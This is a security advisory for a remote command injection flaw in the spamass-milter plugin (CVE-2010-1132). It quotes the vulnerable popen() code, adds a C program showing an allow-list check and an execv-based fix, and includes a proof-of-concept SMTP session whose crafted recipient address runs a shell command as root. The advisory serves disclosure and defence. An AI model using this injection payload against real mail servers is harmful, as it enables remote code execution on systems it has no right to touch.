SpamAssassin Milter Plugin mlfi_envrcpt() Remote Command Injection Vulnerability

Published: 2010-03-07
Updated: 2010-03-09

Affected systems:
SpamAssassin Milter 0.3.1
Description:
BUGTRAQ ID: 38578
CVE(CAN) ID: CVE-2010-1132

SpamAssassin is a solution for filtering spam email.

The Milter plugin used by SpamAssassin does not properly filter the recipient address passed to the mlfi_envrcpt() function before placing it into a "sendmail -bv" command line that is executed through popen(). If spamass-milter is run with the expand flag (the -x option), a crafted recipient address can inject shell commands that are then executed. The vulnerable code in spamass-milter-0.3.1 is as follows:

//
// Gets called once for each recipient
//
// stores the first recipient in the spamassassin object and
// stores all addresses and the number thereof (some redundancy)
//

sfsistat
mlfi_envrcpt(SMFICTX* ctx, char** envrcpt)
{
        struct context *sctx = (struct context*)smfi_getpriv(ctx);
        SpamAssassin* assassin = sctx->assassin;
        FILE *p;
#if defined(__FreeBSD__)
        int rv;
#endif

        debug(D_FUNC, "mlfi_envrcpt: enter");

        if (flag_expand)
        {
                /* open a pipe to sendmail so we can do address expansion */

                char buf[1024];
                /* envrcpt[0] is the raw RCPT TO address from the SMTP client;
                   the surrounding double quotes do not stop a '"' or '|'
                   inside the address from being parsed by /bin/sh */
                char *fmt="%s -bv \"%s\" 2>&1";

#if defined(HAVE_SNPRINTF)
                snprintf(buf, sizeof(buf)-1, fmt, SENDMAIL, envrcpt[0]);
#else
                /* XXX possible buffer overflow here // is this a joke ?! */
                sprintf(buf, fmt, SENDMAIL, envrcpt[0]);
#endif

                debug(D_RCPT, "calling %s", buf);

#if defined(__FreeBSD__) /* popen bug - see PR bin/50770 */
                rv = pthread_mutex_lock(&popen_mutex);
                if (rv)
                {
                        debug(D_ALWAYS, "Could not lock popen mutex: %s", strerror(rv));
                        abort();
                }
#endif

                /* popen() runs buf via "/bin/sh -c", so the recipient is shell-parsed */
                p = popen(buf, "r"); /* [1] */
                if (!p)
                {
                        debug(D_RCPT, "popen failed(%s).  Will not expand aliases", strerror(errno));
                        assassin->expandedrcpt.push_back(envrcpt[0]);
                /* ... (remainder of the function not reproduced in the advisory) */

[1] The vulnerable popen() call
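The following added example is not code from the advisory or from spamass-milter; it is a small C program that reproduces the vulnerable string-building pattern so the resulting command line can be inspected, and shows the two defensive measures a practitioner would apply: an allow-list check on the recipient before it reaches any external tool, and a fork()/execv() replacement for popen() that passes the address as a single argv element so no shell ever parses it. The function names are constructed, the sample recipient is the one from the advisory's test session, and /bin/echo stands in for sendmail (assumption: /bin/echo exists on the host).

```c
#define _POSIX_C_SOURCE 200809L
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed sample: the recipient string used in the advisory's test session. */
static const char *const SAMPLE_RCPT = "root+:\"|touch /tmp/foo\"";

/* The vulnerable pattern from mlfi_envrcpt(): the recipient is pasted into a
 * shell command line that popen() would hand to /bin/sh. Returns the command
 * string so it can be inspected without executing it. */
int build_shell_command(char *buf, size_t n, const char *sendmail, const char *rcpt)
{
    return snprintf(buf, n, "%s -bv \"%s\" 2>&1", sendmail, rcpt);
}

/* Shows why the double quotes in the format string are not a fix: a '"' in
 * the address closes the quoted argument and a '|' starts a new pipeline.
 * Returns 1 if the built command contains the unquoted pipe. */
int injection_reaches_shell(void)
{
    char buf[256];
    build_shell_command(buf, sizeof buf, "/usr/sbin/sendmail", SAMPLE_RCPT);
    return strstr(buf, "\"|touch") != NULL;
}

/* Allow-list check for an address that will be handed to an external tool.
 * Deliberately stricter than RFC 5321: quoted local parts are rejected. */
int rcpt_is_plain(const char *rcpt)
{
    if (*rcpt == '\0') return 0;
    for (; *rcpt; rcpt++) {
        unsigned char c = (unsigned char)*rcpt;
        if (!isalnum(c) && strchr("@.+-_=", c) == NULL) return 0;
    }
    return 1;
}

/* Hardened replacement for the popen() call: fork() and execv() with an argv
 * array, so the recipient arrives as exactly one argument and no shell is
 * involved. The child's stdout/stderr are collected into out. Returns the
 * child's exit status, or -1 on failure. */
int run_without_shell(const char *prog, const char *flag, const char *rcpt,
                      char *out, size_t outlen)
{
    int fds[2];
    int status;
    size_t got = 0;
    ssize_t r;
    pid_t pid;

    if (pipe(fds) < 0) return -1;
    pid = fork();
    if (pid < 0) { close(fds[0]); close(fds[1]); return -1; }
    if (pid == 0) {
        char *const argv[] = { (char *)prog, (char *)flag, (char *)rcpt, NULL };
        dup2(fds[1], STDOUT_FILENO);
        dup2(fds[1], STDERR_FILENO);
        close(fds[0]);
        close(fds[1]);
        execv(prog, argv);   /* argv is passed verbatim; nothing is re-parsed */
        _exit(127);
    }
    close(fds[1]);
    while (got < outlen - 1 && (r = read(fds[0], out + got, outlen - 1 - got)) > 0)
        got += (size_t)r;
    out[got] = '\0';
    close(fds[0]);
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* /bin/echo stands in for sendmail (assumption: it exists on the host).
 * Returns 1 if the whole payload came back as one argument, i.e. nothing in
 * it was interpreted as a shell operator. */
int payload_stays_one_argument(void)
{
    char out[256];
    if (run_without_shell("/bin/echo", "-n", SAMPLE_RCPT, out, sizeof out) != 0)
        return 0;
    return strcmp(out, SAMPLE_RCPT) == 0;
}

int main(void)
{
    char buf[256];
    build_shell_command(buf, sizeof buf, "/usr/sbin/sendmail", SAMPLE_RCPT);
    printf("popen() would run: %s\n", buf);
    printf("allow-list accepts payload: %d\n", rcpt_is_plain(SAMPLE_RCPT));
    printf("execv keeps payload intact: %d\n", payload_stays_one_argument());
    return 0;
}
```

The allow-list is the cheap, local check; the execv() path is the structural fix, because it removes the shell from the call chain entirely and makes the content of the recipient irrelevant to what gets executed. The same two measures apply to any milter or MTA hook that passes SMTP-supplied strings to an external program.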

Source: Kingcope (kingcope@gmx.net)

Links: http://marc.info/?l=full-disclosure&m=126798948017998&q=p5
       http://secunia.com/advisories/38840/
       http://www.debian.org/security/2010/dsa-2021

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users bear the risk themselves!

$ nc localhost 25
220 ownthabox ESMTP Postfix (Ubuntu)
mail from: me@me.com
250 2.1.0 Ok
rcpt to: root+:"|touch /tmp/foo"
250 2.1.5 Ok

$ ls -la /tmp/foo
-rw-r--r-- 1 root root 0 2010-03-07 19:46 /tmp/foo

Recommendations:
Vendor patches:

Debian
------
Debian has released a security advisory (DSA-2021-1) and corresponding patches for this issue:
DSA-2021-1: New spamass-milter packages fix remote command
Link: http://www.debian.org/security/2010/dsa-2021

This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.